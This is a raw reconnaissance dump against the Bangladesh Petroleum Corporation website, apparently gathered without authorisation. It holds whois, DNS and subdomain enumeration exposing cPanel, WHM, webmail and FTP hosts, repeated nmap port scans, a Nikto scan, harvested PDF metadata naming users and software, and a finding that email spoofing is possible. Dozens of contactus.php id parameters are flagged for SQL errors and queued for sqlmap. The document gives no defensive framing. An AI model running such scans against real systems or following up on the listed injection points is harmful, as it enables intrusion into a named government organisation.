- ######################################################################################################################################
- Hostname www.bpc.gov.bd ISP TierPoint, LLC
- Continent North America Flag
- US
- Country United States Country Code US
- Region Unknown Local time 22 Nov 2018 11:03 CST
- City Unknown Postal Code Unknown
- IP Address 173.237.136.21 Latitude 37.751
- Longitude -97.822
- #######################################################################################################################################
- > www.bpc.gov.bd
- Server: 194.187.251.67
- Address: 194.187.251.67#53
- Non-authoritative answer:
- www.bpc.gov.bd canonical name = bpc.gov.bd.
- Name: bpc.gov.bd####
- Address: 173.237.136.21
- #######################################################################################################################################
- HostIP:173.237.136.21
- HostName:www.bpc.gov.bd
- Gathered Inet-whois information for 173.237.136.21
- --------------------------------------------------------------------------------------------------------------------------------------
- inetnum: 173.234.136.0 - 173.244.143.255
- netname: NON-RIPE-NCC-MANAGED-ADDRESS-BLOCK
- descr: IPv4 address block not managed by the RIPE NCC
- remarks: ------------------------------------------------------
- remarks:
- remarks: You can find the whois server to query, or the
- remarks: IANA registry to query on this web page:
- remarks: http://www.iana.org/assignments/ipv4-address-space
- remarks:
- remarks: You can access databases of other RIRs at:
- remarks:
- remarks: AFRINIC (Africa)
- remarks: http://www.afrinic.net/ whois.afrinic.net
- remarks:
- remarks: APNIC (Asia Pacific)
- remarks: http://www.apnic.net/ whois.apnic.net
- remarks:
- remarks: ARIN (Northern America)
- remarks: http://www.arin.net/ whois.arin.net
- remarks:
- remarks: LACNIC (Latin America and the Carribean)
- remarks: http://www.lacnic.net/ whois.lacnic.net
- remarks:
- remarks: IANA IPV4 Recovered Address Space
- remarks: http://www.iana.org/assignments/ipv4-recovered-address-space/ipv4-recovered-address-space.xhtml
- remarks:
- remarks: ------------------------------------------------------
- country: EU # Country is really world wide
- admin-c: IANA1-RIPE
- tech-c: IANA1-RIPE
- status: ALLOCATED UNSPECIFIED
- mnt-by: RIPE-NCC-HM-MNT
- mnt-lower: RIPE-NCC-HM-MNT
- created: 2018-07-09T15:19:05Z
- last-modified: 2018-09-04T13:35:20Z
- source: RIPE
- role: Internet Assigned Numbers Authority
- address: see http://www.iana.org.
- admin-c: IANA1-RIPE
- tech-c: IANA1-RIPE
- nic-hdl: IANA1-RIPE
- remarks: For more information on IANA services
- remarks: go to IANA web site at http://www.iana.org.
- mnt-by: RIPE-NCC-MNT
- created: 1970-01-01T00:00:00Z
- last-modified: 2001-09-22T09:31:27Z
- source: RIPE # Filtered
- % This query was served by the RIPE Database Query Service version 1.92.6 (WAGYU)
- Gathered Inic-whois information for bpc.gov.bd
- --------------------------------------------------------------------------------------------------------------------------------------
- Error: Unable to connect - Invalid Host
- ERROR: Connection to InicWhois Server bd.whois-servers.net failed
- close error
- Gathered Netcraft information for www.bpc.gov.bd
- --------------------------------------------------------------------------------------------------------------------------------------
- Retrieving Netcraft.com information for www.bpc.gov.bd
- Netcraft.com Information gathered
- Gathered Subdomain information for bpc.gov.bd
- -------------------------------------------------------------------------------------------------------------------------------------
- Searching Google.com:80...
- HostName:www.bpc.gov.bd
- HostIP:173.237.136.21
- Searching Altavista.com:80...
- Found 1 possible subdomain(s) for host bpc.gov.bd, Searched 0 pages containing 0 results
- Gathered E-Mail information for bpc.gov.bd
- -----------------------------------------------------------------------------------------------------------------------------------
- Searching Google.com:80...
- Searching Altavista.com:80...
- Found 0 E-Mail(s) for host bpc.gov.bd, Searched 0 pages containing 0 results
- Gathered TCP Port information for 173.237.136.21
- --------------------------------------------------------------------------------------------------------------------------------------
- Port State
- 21/tcp open
- 22/tcp open
- 26/tcp open
- 53/tcp open
- 80/tcp open
- 110/tcp open
- 143/tcp open
- Portscan Finished: Scanned 150 ports, 141 ports were in state closed
- #######################################################################################################################################
- [i] Scanning Site: http://www.bpc.gov.bd
- B A S I C I N F O
- =======================================================================================================================================
- [+] Site Title: Bangladesh Petroleum Corporation
- [+] IP address: 173.237.136.21
- [+] Web Server: Could Not Detect
- [+] CMS: Could Not Detect
- [+] Cloudflare: Not Detected
- [+] Robots File: Could NOT Find robots.txt!
- G E O I P L O O K U P
- =======================================================================================================================================
- [i] IP Address: 173.237.136.21
- [i] Country: US
- [i] State: Missouri
- [i] City: Saint Louis
- [i] Latitude: 38.614300
- [i] Longitude: -90.444397
- H T T P H E A D E R S
- =======================================================================================================================================
- [i] HTTP/1.1 200 OK
- [i] Date: Thu, 22 Nov 2018 17:10:26 GMT
- [i] Content-Type: text/html; charset=UTF-8
- [i] Connection: close
- D N S L O O K U P
- =======================================================================================================================================
- bpc.gov.bd. 21599 IN SOA ns1.speedydns.net. root.uscentral22.myserverhosts.com. 2018070501 86400 7200 3600000 86400
- bpc.gov.bd. 21599 IN A 173.237.136.21
- bpc.gov.bd. 21599 IN MX 0 bpc.gov.bd.
- bpc.gov.bd. 21599 IN NS ns1.speedydns.net.
- bpc.gov.bd. 21599 IN NS ns2.speedydns.net.
- S U B N E T C A L C U L A T I O N
- ======================================================================================================================================
- Address = 173.237.136.21
- Network = 173.237.136.21 / 32
- Netmask = 255.255.255.255
- Broadcast = not needed on Point-to-Point links
- Wildcard Mask = 0.0.0.0
- Hosts Bits = 0
- Max. Hosts = 1 (2^0 - 0)
- Host Range = { 173.237.136.21 - 173.237.136.21 }
- N M A P P O R T S C A N
- ======================================================================================================================================
- Starting Nmap 7.40 ( https://nmap.org ) at 2018-11-22 17:10 UTC
- Nmap scan report for bpc.gov.bd (173.237.136.21)
- Host is up (0.038s latency).
- rDNS record for 173.237.136.21: uscentral22.myserverhosts.com
- PORT STATE SERVICE
- 21/tcp open ftp
- 22/tcp open ssh
- 23/tcp filtered telnet
- 80/tcp open http
- 110/tcp open pop3
- 143/tcp open imap
- 443/tcp open https
- 3389/tcp closed ms-wbt-server
- Nmap done: 1 IP address (1 host up) scanned in 2.95 seconds
- S Q L V U L N E R A B I L I T Y S C A N N E R
- =======================================================================================================================================
- [#] contactus.php?id=32
- [-] Searching For SQL Errors: Found!
- [#] contactus.php?id=1
- [-] Searching For SQL Errors: Found!
- [#] contactus.php?id=3
- [-] Searching For SQL Errors: Found!
- [#] contactus.php?id=5
- [-] Searching For SQL Errors: Found!
- [#] contactus.php?id=6
- [-] Searching For SQL Errors: Found!
- [#] contactus.php?id=7
- [-] Searching For SQL Errors: Found!
- [#] contactus.php?id=8
- [-] Searching For SQL Errors: Found!
- [#] contactus.php?id=14
- [-] Searching For SQL Errors: Found!
- [#] contactus.php?id=23
- [-] Searching For SQL Errors: Found!
- [#] contactus.php?id=32
- [-] Searching For SQL Errors: Found!
- [#] contactus.php?id=40
- [-] Searching For SQL Errors: Found!
- [#] contactus.php?id=4
- [-] Searching For SQL Errors: Found!
- [#] contactus.php?id=35
- [-] Searching For SQL Errors: Found!
- [#] contactus.php?id=17
- [-] Searching For SQL Errors: Found!
- [#] contactus.php?id=18
- [-] Searching For SQL Errors: Found!
- [#] contactus.php?id=19
- [-] Searching For SQL Errors: Found!
- [#] contactus.php?id=20
- [-] Searching For SQL Errors: Found!
- [#] contactus.php?id=21
- [-] Searching For SQL Errors: Found!
- [#] contactus.php?id=36
- [-] Searching For SQL Errors: Found!
- [#] contactus.php?id=37
- [-] Searching For SQL Errors: Found!
- [#] contactus.php?id=52
- [-] Searching For SQL Errors: Found!
- [#] contactus.php?id=45
- [-] Searching For SQL Errors: Found!
- [#] contactus.php?id=46
- [-] Searching For SQL Errors: Found!
- [#] contactus.php?id=47
- [-] Searching For SQL Errors: Found!
- [#] contactus.php?id=48
- [-] Searching For SQL Errors: Found!
- [#] contactus.php?id=49
- [-] Searching For SQL Errors: Found!
- [#] contactus.php?id=2
- [-] Searching For SQL Errors: Found!
- [#] contactus.php?id=12
- [-] Searching For SQL Errors: Found!
- [#] contactus.php?id=22
- [-] Searching For SQL Errors: Found!
- [#] contactus.php?id=27
- [-] Searching For SQL Errors: Found!
- [#] contactus.php?id=28
- [-] Searching For SQL Errors: Found!
- [#] contactus.php?id=29
- [-] Searching For SQL Errors: Found!
- [#] contactus.php?id=39
- [-] Searching For SQL Errors: Found!
- [#] contactus.php?id=41
- [-] Searching For SQL Errors: Found!
- [#] contactus.php?id=13
- [-] Searching For SQL Errors: Found!
- [#] contactus.php?id=26
- [-] Searching For SQL Errors: Found!
- [#] contactus.php?id=18
- [-] Searching For SQL Errors: Found!
- [#] contactus.php?id=36
- [-] Searching For SQL Errors: Found!
- [#] contactus.php?id=37
- [-] Searching For SQL Errors: Found!
- #######################################################################################################################################
- [?] Enter the target: http://www.bpc.gov.bd/
- [!] IP Address : 173.237.136.21
- [!] www.bpc.gov.bd doesn't seem to use a CMS
- [+] Honeypot Probabilty: 30%
- ---------------------------------------------------------------------------------------------------------------------------------------
- [~] Trying to gather whois information for www.bpc.gov.bd
- [+] Whois information found
- [-] Unable to build response, visit https://who.is/whois/www.bpc.gov.bd
- -------------------------------------------------------------------------------------------------------------------------------------
- PORT STATE SERVICE
- 21/tcp open ftp
- 22/tcp open ssh
- 23/tcp filtered telnet
- 80/tcp open http
- 110/tcp open pop3
- 143/tcp open imap
- 443/tcp open https
- 3389/tcp closed ms-wbt-server
- Nmap done: 1 IP address (1 host up) scanned in 1.25 seconds
- --------------------------------------------------------------------------------------------------------------------------------------
- [+] DNS Records
- ns1.speedydns.net. (174.37.183.108) AS36351 SoftLayer Technologies Inc. United States
- ns2.speedydns.net. (50.22.35.226) AS36351 SoftLayer Technologies Inc. United States
- [+] MX Records
- 0 (173.237.136.21) AS36024 Colo4, LLC United States
- [+] Host Records (A)
- www.bpc.gov.bdHTTP: (uscentral22.myserverhosts.com) (173.237.136.21) AS36024 Colo4, LLC United States
- [+] TXT Records
- [+] DNS Map: https://dnsdumpster.com/static/map/bpc.gov.bd.png
- [>] Initiating 3 intel modules
- [>] Loading Alpha module (1/3)
- [>] Beta module deployed (2/3)
- [>] Gamma module initiated (3/3)
- [+] Emails found:
- -------------------------------------------------------------------------------------------------------------------------------------
- pixel-1542906651361929-web-@www.bpc.gov.bd
- pixel-1542906653819235-web-@www.bpc.gov.bd
- No hosts found
- [+] Virtual hosts:
- --------------------------------------------------------------------------------------------------------------------------------------
- [~] Crawling the target for fuzzable URLs
- [+] Found 39 fuzzable URLs
- http://www.bpc.gov.bd//contactus.php?id=32
- [~] Using SQLMap api to check for SQL injection vulnerabilities. Don't worry we are using an online service and it doesn't depend on your internet connection. This scan will take 2-3 minutes.
- #######################################################################################################################################
- [+] Hosting Info for Website: www.bpc.gov.bd
- [+] Visitors per day: 2,360
- [+] IP Address: 173.237.136.21
- [+] IP Reverse DNS (Host): uscentral22.myserverhosts.com
- [+] Hosting IP Range: 173.237.128.0 - 173.237.191.255 (16,384 ip)
- [+] Hosting Address: 12444 Powerscourt Drive Suite 450, St. Louis, MO, 63131, US
- [+] Hosting Country: USA
- [+] Hosting Phone: +1-484-893-1507, +1-609-220-0322, +1-610-994-3046
- [+] Hosting Website: api.jumis.com
- [+] CIDR: 173.237.128.0/18
- [+] Hosting CIDR: 173.237.128.0/18
- [+] NS: bpc.gov.bd
- [+] NS: ns2.speedydns.net
- [+] NS: ns1.speedydns.net
- ######################################################################################################################################
- ; <<>> DiG 9.11.5-1-Debian <<>> bpc.gov.bd
- ;; global options: +cmd
- ;; Got answer:
- ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 36802
- ;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1
- ;; OPT PSEUDOSECTION:
- ; EDNS: version: 0, flags:; udp: 4096
- ;; QUESTION SECTION:
- ;bpc.gov.bd. IN A
- ;; ANSWER SECTION:
- bpc.gov.bd. 84833 IN A 173.237.136.21
- ;; Query time: 120 msec
- ;; SERVER: 194.187.251.67#53(194.187.251.67)
- ;; WHEN: jeu nov 22 12:29:33 EST 2018
- ;; MSG SIZE rcvd: 55
- #####################################################################################################################################
- ; <<>> DiG 9.11.5-1-Debian <<>> +trace bpc.gov.bd
- ;; global options: +cmd
- . 86160 IN NS h.root-servers.net.
- . 86160 IN NS c.root-servers.net.
- . 86160 IN NS l.root-servers.net.
- . 86160 IN NS g.root-servers.net.
- . 86160 IN NS m.root-servers.net.
- . 86160 IN NS b.root-servers.net.
- . 86160 IN NS e.root-servers.net.
- . 86160 IN NS i.root-servers.net.
- . 86160 IN NS k.root-servers.net.
- . 86160 IN NS a.root-servers.net.
- . 86160 IN NS d.root-servers.net.
- . 86160 IN NS f.root-servers.net.
- . 86160 IN NS j.root-servers.net.
- . 86160 IN RRSIG NS 8 0 518400 20181205050000 20181122040000 2134 . GbKyyBgbCU9fsYw/7uunYdGXnGc/GkWD7cWhP2+DSip0Tz3Vy+JJ79NZ ml0SGP0/S4GlCXVm11FpcXQOPTpoJZdtJqb/403hlOwB5q9CEooFek5d cWhmFYrkAML8E48uU1+ji72NRCdzs9saOPGk/FRlc4dTQwVNI97qqJMT GnHK9wqugnfiV4jFnAX/UmikW1tOdRyeTaqB5voY1Tku7x8XvLsu/5VL 4SOobgjvdbaLTgJqZTjLq0Q1fNMztDU3cr3I1NNWkcKSUOiAJ8tThR4s almON2rxSXGYyhwlbLezIsBj3RDEfYuc6V2TRRuSbv/fGE75rZBFYyc4 wZWwyw==
- ;; Received 525 bytes from 194.187.251.67#53(194.187.251.67) in 120 ms
- bd. 172800 IN NS jamuna.btcl.net.bd.
- bd. 172800 IN NS dns.bd.
- bd. 172800 IN NS surma.btcl.net.bd.
- bd. 172800 IN NS bd-ns.anycast.pch.net.
- bd. 86400 IN NSEC be. NS RRSIG NSEC
- bd. 86400 IN RRSIG NSEC 8 1 86400 20181205050000 20181122040000 2134 . Cee16WQpXm9zmIh4pKmOHxD7UY+0gLgYXlQx87XivrpYpTRMb3xaKc8A 98iY4jtO5j30dyLZkpR8loCWgw6un4F8MhfZLloTARKxc+EU19tUcEWO N/qgTta/lsOjDPG12VQByhlKXsPaKWDfK6zUMQbiEr+ivZxhp/gv98vJ z+F5z9+WIm6ss9x45a6XDOj9eIndlyNSkiBUcII3YsK65do3dLw1oW4v WvrkOBD5cRcyUSOUm1JNSdAdrAfCCv6A4Ovd8D151QfEzrieGXyaNHJT zM5lGpqnaV6S1xaqwv/rW8n+RJCyBb1MAxjqh9btPjRPZt+bHBjuR6mG naBlrA==
- ;; Received 657 bytes from 199.9.14.201#53(b.root-servers.net) in 280 ms
- bpc.gov.bd. 86400 IN NS ns2.speedydns.net.
- bpc.gov.bd. 86400 IN NS ns1.speedydns.net.
- ;; Received 88 bytes from 204.61.216.108#53(bd-ns.anycast.pch.net) in 117 ms
- ;; expected opt record in response
- bpc.gov.bd. 86400 IN A 173.237.136.21
- bpc.gov.bd. 86400 IN NS ns1.speedydns.net.
- bpc.gov.bd. 86400 IN NS ns2.speedydns.net.
- ;; Received 125 bytes from 174.37.183.108#53(ns1.speedydns.net) in 247 ms
- ######################################################################################################################################
- [*] Performing General Enumeration of Domain: bpc.gov.bd
- [-] DNSSEC is not configured for bpc.gov.bd
- [*] SOA ns1.speedydns.net 174.37.183.108
- [*] NS ns2.speedydns.net 50.22.35.226
- [*] NS ns1.speedydns.net 174.37.183.108
- [*] MX bpc.gov.bd 173.237.136.21
- [*] A bpc.gov.bd 173.237.136.21
- [*] Enumerating SRV Records
- [-] No SRV Records Found for bpc.gov.bd
- [+] 0 Records Found
- ######################################################################################################################################
- [*] Processing domain bpc.gov.bd
- [+] Getting nameservers
- 50.22.35.226 - ns2.speedydns.net
- 174.37.183.108 - ns1.speedydns.net
- [-] Zone transfer failed
- [+] MX records found, added to target list
- 0 bpc.gov.bd.
- [*] Scanning bpc.gov.bd for A records
- 173.237.136.21 - bpc.gov.bd
- 173.237.136.21 - autodiscover.bpc.gov.bd
- 173.237.136.21 - autoconfig.bpc.gov.bd
- 173.237.136.21 - cpanel.bpc.gov.bd
- 173.237.136.21 - ftp.bpc.gov.bd
- 127.0.0.1 - localhost.bpc.gov.bd
- 173.237.136.21 - mail.bpc.gov.bd
- 173.237.136.21 - webdisk.bpc.gov.bd
- 173.237.136.21 - webmail.bpc.gov.bd
- 173.237.136.21 - whm.bpc.gov.bd
- 173.237.136.21 - www.bpc.gov.bd
- #######################################################################################################################################
- Ip Address Status Type Domain Name Server
- ---------- ------ ---- ----------- ------
- 173.237.136.21 200 host ftp.bpc.gov.bd
- 127.0.0.1 host localhost.bpc.gov.bd
- 173.237.136.21 200 alias mail.bpc.gov.bd
- 173.237.136.21 200 host bpc.gov.bd
- 173.237.136.21 301 host webmail.bpc.gov.bd
- 173.237.136.21 200 alias www.bpc.gov.bd
- 173.237.136.21 200 host bpc.gov.bd
- ######################################################################################################################################
- [+] Testing domain
- www.bpc.gov.bd 173.237.136.21
- [+] Dns resolving
- Domain name Ip address Name server
- bpc.gov.bd 173.237.136.21 uscentral22.myserverhosts.com
- Found 1 host(s) for bpc.gov.bd
- [+] Testing wildcard
- Ok, no wildcard found.
- [+] Scanning for subdomain on bpc.gov.bd
- [!] Wordlist not specified. I scannig with my internal wordlist...
- Estimated time about 127.6 seconds
- Subdomain Ip address Name server
- ftp.bpc.gov.bd 173.237.136.21 uscentral22.myserverhosts.com
- localhost.bpc.gov.bd 127.0.0.1 localhost
- mail.bpc.gov.bd 173.237.136.21 uscentral22.myserverhosts.com
- webmail.bpc.gov.bd 173.237.136.21 uscentral22.myserverhosts.com
- www.bpc.gov.bd 173.237.136.21 uscentral22.myserverhosts.com
- #######################################################################################################################################
- Start: 2018-11-22T17:28:48+0000
- HOST: web01 Loss% Snt Last Avg Best Wrst StDev
- 1.|-- 45.79.12.202 0.0% 3 1.1 0.8 0.7 1.1 0.2
- 2.|-- 45.79.12.6 0.0% 3 1.0 3.6 0.7 9.2 4.8
- 3.|-- dls-b22-link.telia.net 0.0% 3 0.9 1.0 0.9 1.3 0.2
- 4.|-- dls-b21-link.telia.net 0.0% 3 1.4 3.4 1.4 6.3 2.6
- 5.|-- tierpoint-ic-310923-dls-b21.c.telia.net 0.0% 3 1.4 5.8 1.4 14.4 7.4
- 6.|-- 207.210.229.6 0.0% 3 1.7 1.7 1.7 1.8 0.0
- 7.|-- 174.136.31.218 0.0% 3 1.3 1.4 1.3 1.4 0.1
- 8.|-- uscentral22.myserverhosts.com 0.0% 3 1.4 1.6 1.4 1.8 0.2
- #######################################################################################################################################
- ---------------------------------------------------------------------------------------------------------------------------------------
- + Target IP: 173.237.136.21
- + Target Hostname: www.bpc.gov.bd
- + Target Port: 80
- + Start Time: 2018-11-22 12:08:57 (GMT-5)
- ---------------------------------------------------------------------------------------------------------------------------------------
- + Server: No banner retrieved
- + The anti-clickjacking X-Frame-Options header is not present.
- + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
- + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
- + Uncommon header 'x-squid-error' found, with contents: ERR_INVALID_URL 0
- + ERROR: Error limit (20) reached for host, giving up. Last error: error reading HTTP response
- + Scan terminated: 13 error(s) and 4 item(s) reported on remote host
- + End Time: 2018-11-22 13:05:53 (GMT-5) (3416 seconds)
- ---------------------------------------------------------------------------------------------------------------------------------------
- ######################################################################################################################################
- dnsenum VERSION:1.2.4
- ----- www.bpc.gov.bd -----
- Host's addresses:
- __________________
- bpc.gov.bd. 86400 IN A 173.237.136.21
- Name Servers:
- ______________
- ns2.speedydns.net. 86081 IN A 50.22.35.226
- ns1.speedydns.net. 86065 IN A 174.37.183.108
- Mail (MX) Servers:
- ___________________
- bpc.gov.bd. 86400 IN A 173.237.136.21
- Trying Zone Transfers and getting Bind Versions:
- _________________________________________________
- Trying Zone Transfer for www.bpc.gov.bd on ns2.speedydns.net ...
- Trying Zone Transfer for www.bpc.gov.bd on ns1.speedydns.net ...
- brute force file not specified, bay.
- #######################################################################################################################################
- ---------------------------------------------------------------------------------------------------------------------------------------
- [1/25] /webhp?hl=en-FR
- [x] Error downloading /webhp?hl=en-FR
- [2/25] http://www.bpc.gov.bd/admin/current_vacancies/b684c889e14c1df86dd830a9fd904cdd.pdf
- [x] Error in PDF metadata Creator
- [3/25] http://www.bpc.gov.bd/admin/notice/12fd8e6bc2cf87cca46f19a3e7b9a611.pdf
- [x] Error in the parsing process
- [4/25] http://www.bpc.gov.bd/admin/news/c1b73506b57f8ebf2928f704827dd5c1.pdf
- [5/25] http://www.bpc.gov.bd/admin/news/0f0d9138a5e0898c496fa98006f712d6.pdf
- [6/25] http://www.bpc.gov.bd/admin/news/685281be8984823884192e42eea1d05b.pdf
- [7/25] http://www.bpc.gov.bd/admin/news/f952301b036b57834b7ee3a2de020472.pdf
- [8/25] http://www.bpc.gov.bd/admin/annual_report/5878e46e61726e85a43b91e477ebeadf.pdf
- [x] Error in PDF metadata Creator
- [9/25] http://www.bpc.gov.bd/admin/annual_report/50f12271ac13cec7515303ea83553f03.pdf
- [x] Error in PDF metadata Creator
- [10/25] http://www.bpc.gov.bd/admin/annual_report/a70881d948e78e700e8581525b36c72e.pdf
- [x] Error in PDF metadata Creator
- [11/25] http://www.bpc.gov.bd/admin/notice/4eabe0863aa66c8b75c50512ce82e19f.pdf
- [x] Error in PDF metadata Creator
- [12/25] http://www.bpc.gov.bd/admin/news/d455f1c285096b6258557e06533c075c.pdf
- [13/25] https://www.bpc.gov.bd/admin/annual_performance_agreement/5ee366afaf58b1fefc13bb66c661f311.pdf
- [x] Error downloading https://www.bpc.gov.bd/admin/annual_performance_agreement/5ee366afaf58b1fefc13bb66c661f311.pdf
- [14/25] http://www.bpc.gov.bd/admin/notice/dc7b13b25ad04c58c5f8c9ee7b636ce2.pdf
- [x] Error in the parsing process
- [15/25] http://www.bpc.gov.bd/admin/annual_performance_agreement/890199e67b62b98b41ec178498f3fc50.pdf
- [x] Error in PDF metadata Creator
- [16/25] http://www.bpc.gov.bd/admin/notice/1e0e387a348b442c5b7526aabdd7ce81.pdf
- [x] Error in the parsing process
- [17/25] http://www.bpc.gov.bd/admin/notice/dbef95d4ba79e5a67d69995e72d5a3ff.pdf
- [x] Error in the parsing process
- [18/25] http://www.bpc.gov.bd/admin/news/b7807166e10bff066ade14a348b34eb8.pdf
- [19/25] http://www.bpc.gov.bd/admin/notice/28ee5a0e6338c34c25fcd818bec1895b.pdf
- [x] Error in the parsing process
- [20/25] http://www.bpc.gov.bd/admin/news/8d3e9ece7700392e11a588c85d14fd46.pdf
- [21/25] http://www.bpc.gov.bd/admin/notice/553a692d84b865b3f8d6c87a7579dc8f.pdf
- [x] Error in the parsing process
- [22/25] http://www.bpc.gov.bd/admin/notice/383e04897c6786078e0d34677956f3e0.pdf
- [x] Error in the parsing process
- [23/25] http://www.bpc.gov.bd/admin/vacancy/7cff6f9ef50bc77b13a761d6c642c5ba.pdf
- [24/25] http://www.bpc.gov.bd/admin/annual_performance_agreement/f05a92ce7e1091227bd945ff36175103.pdf
- [x] Error in PDF metadata Creator
- [25/25] http://www.bpc.gov.bd/admin/current_vacancies/99abe678b4ebe6abddbdb7f9fb75fe4a.pdf
- ######################################################################################################################################
- [+] List of users found:
- ---------------------------------------------------------------------------------------------------------------------------------------
- USER
- DELL
- [+] List of software found:
- -----------------------------
- GPL Ghostscript 9.14
- PDF24 Creator
- IJ Scan Utility
- Canon SC1011
- Adobe PDF Library 5.0.5
- HP PDF Formatter version 7.0.0.175
- DPE Build 5656
- GPL Ghostscript 9.22
- PDF Splitter and Merger (http://www.pdfarea.com)
- [+] List of e-mails found:
- ----------------------------
- cl@Ifr
- f@a
- rqtfterstg@sqm
- .r@r
- ######################################################################################################################################
- Running Source: Ask
- Running Source: Archive.is
- Running Source: Baidu
- Running Source: Bing
- Running Source: CertDB
- Running Source: CertificateTransparency
- Running Source: Certspotter
- Running Source: Commoncrawl
- Running Source: Crt.sh
- Running Source: Dnsdb
- Running Source: DNSDumpster
- Running Source: DNSTable
- Running Source: Dogpile
- Running Source: Exalead
- Running Source: Findsubdomains
- Running Source: Googleter
- Running Source: Hackertarget
- Running Source: Ipv4Info
- Running Source: PTRArchive
- Running Source: Sitedossier
- Running Source: Threatcrowd
- Running Source: ThreatMiner
- Running Source: WaybackArchive
- Running Source: Yahoo
- Running enumeration on www.bpc.gov.bd
- dnsdb: Unexpected return status 503
- waybackarchive: Get https://web.archive.org/cdx/search/cdx?url=*.www.bpc.gov.bd/*&output=json&fl=original&collapse=urlkey&page=: net/http: invalid header field value "http://web.archive.org/cdx/search/cdx?url=*.www.bpc.gov.bd/*&output=json&fl=original&collapse=urlkey&page=\x00" for key Referer
- Starting Bruteforcing of www.bpc.gov.bd with 9985 words
- Total 1 Unique subdomains found for www.bpc.gov.bd
- .www.bpc.gov.bd
- #######################################################################################################################################
- [+] www.bpc.gov.bd has no SPF record!
- [*] No DMARC record found. Looking for organizational record
- [+] No organizational DMARC record
- [+] Spoofing possible for www.bpc.gov.bd!
- #######################################################################################################################################
- __
- ____ _____ ___ ______ _/ /_____ ____ ___
- / __ `/ __ `/ / / / __ `/ __/ __ \/ __ \/ _ \
- / /_/ / /_/ / /_/ / /_/ / /_/ /_/ / / / / __/
- \__,_/\__, /\__,_/\__,_/\__/\____/_/ /_/\___/
- /_/ discover v0.5.0 - by @michenriksen
- Identifying nameservers for www.bpc.gov.bd... Done
- Using nameservers:
- - 50.22.35.226
- - 174.37.183.108
- Checking for wildcard DNS... Done
- Running collector: Threat Crowd... Done (0 hosts)
- Running collector: DNSDB... Error
- -> DNSDB returned unexpected response code: 503
- Running collector: Netcraft... Done (0 hosts)
- Running collector: PublicWWW... Done (0 hosts)
- Running collector: Censys... Skipped
- -> Key 'censys_secret' has not been set
- Running collector: Wayback Machine... Done (5 hosts)
- Running collector: PTRArchive... Error
- -> PTRArchive returned unexpected response code: 502
- Running collector: PassiveTotal... Skipped
- -> Key 'passivetotal_key' has not been set
- Running collector: Shodan... Skipped
- -> Key 'shodan' has not been set
- Running collector: Riddler... Skipped
- -> Key 'riddler_username' has not been set
- Running collector: VirusTotal... Skipped
- -> Key 'virustotal' has not been set
- Running collector: Dictionary... Done (0 hosts)
- Running collector: HackerTarget... Done (1 host)
- Running collector: Google Transparency Report... Done (0 hosts)
- Running collector: Certificate Search... Done (0 hosts)
- Resolving 5 unique hosts...
- 173.237.136.21 bpc.gov.bd
- 173.237.136.21 cpanel.bpc.gov.bd
- 173.237.136.21 mail.bpc.gov.bd
- 173.237.136.21 webmail.bpc.gov.bd
- 173.237.136.21 www.bpc.gov.bd
- Found subnets:
- - 173.237.136.0-255 : 5 hosts
- Wrote 5 hosts to:
- - file:///root/aquatone/www.bpc.gov.bd/hosts.txt
- - file:///root/aquatone/www.bpc.gov.bd/hosts.json
- __
- ____ _____ ___ ______ _/ /_____ ____ ___
- / __ `/ __ `/ / / / __ `/ __/ __ \/ __ \/ _ \
- / /_/ / /_/ / /_/ / /_/ / /_/ /_/ / / / / __/
- \__,_/\__, /\__,_/\__,_/\__/\____/_/ /_/\___/
- /_/ takeover v0.5.0 - by @michenriksen
- Loaded 5 hosts from /root/aquatone/www.bpc.gov.bd/hosts.json
- Loaded 25 domain takeover detectors
- Identifying nameservers for www.bpc.gov.bd... Done
- Using nameservers:
- - 50.22.35.226
- - 174.37.183.108
- Checking hosts for domain takeover vulnerabilities...
- Finished checking hosts:
- - Vulnerable : 0
- - Not Vulnerable : 5
- Wrote 0 potential subdomain takeovers to:
- - file:///root/aquatone/www.bpc.gov.bd/takeovers.json
- __
- ____ _____ ___ ______ _/ /_____ ____ ___
- / __ `/ __ `/ / / / __ `/ __/ __ \/ __ \/ _ \
- / /_/ / /_/ / /_/ / /_/ / /_/ /_/ / / / / __/
- \__,_/\__, /\__,_/\__,_/\__/\____/_/ /_/\___/
- /_/ scan v0.5.0 - by @michenriksen
- Loaded 5 hosts from /root/aquatone/www.bpc.gov.bd/hosts.json
- Probing 2 ports...
- 80/tcp 173.237.136.21 www.bpc.gov.bd, webmail.bpc.gov.bd, cpanel.bpc.gov.bd and 2 more
- 443/tcp 173.237.136.21 www.bpc.gov.bd, cpanel.bpc.gov.bd, mail.bpc.gov.bd and 2 more
- Wrote open ports to file:///root/aquatone/www.bpc.gov.bd/open_ports.txt
- Wrote URLs to file:///root/aquatone/www.bpc.gov.bd/urls.txt
- __
- ____ _____ ___ ______ _/ /_____ ____ ___
- / __ `/ __ `/ / / / __ `/ __/ __ \/ __ \/ _ \
- / /_/ / /_/ / /_/ / /_/ / /_/ /_/ / / / / __/
- \__,_/\__, /\__,_/\__,_/\__/\____/_/ /_/\___/
- /_/ gather v0.5.0 - by @michenriksen
- Processing 10 pages...
- Incompatability Error: Nightmarejs must be run on a system with a graphical desktop session (X11)
- Incompatability Error: Nightmarejs must be run on a system with a graphical desktop session (X11)
- Incompatability Error: Nightmarejs must be run on a system with a graphical desktop session (X11)
- Incompatability Error: Nightmarejs must be run on a system with a graphical desktop session (X11)
- Incompatability Error: Nightmarejs must be run on a system with a graphical desktop session (X11)
- Incompatability Error: Nightmarejs must be run on a system with a graphical desktop session (X11)
- Incompatability Error: Nightmarejs must be run on a system with a graphical desktop session (X11)
- Incompatability Error: Nightmarejs must be run on a system with a graphical desktop session (X11)
- Incompatability Error: Nightmarejs must be run on a system with a graphical desktop session (X11)
- Incompatability Error: Nightmarejs must be run on a system with a graphical desktop session (X11)
- #######################################################################################################################################
- Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-23 00:07 EST
- Nmap scan report for www.bpc.gov.bd (173.237.136.21)
- Host is up (0.22s latency).
- Not shown: 459 closed ports, 3 filtered ports
- Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
- PORT STATE SERVICE
- 21/tcp open ftp
- 22/tcp open ssh
- 53/tcp open domain
- 80/tcp open http
- 110/tcp open pop3
- 143/tcp open imap
- 443/tcp open https
- 465/tcp open smtps
- 587/tcp open submission
- 993/tcp open imaps
- 995/tcp open pop3s
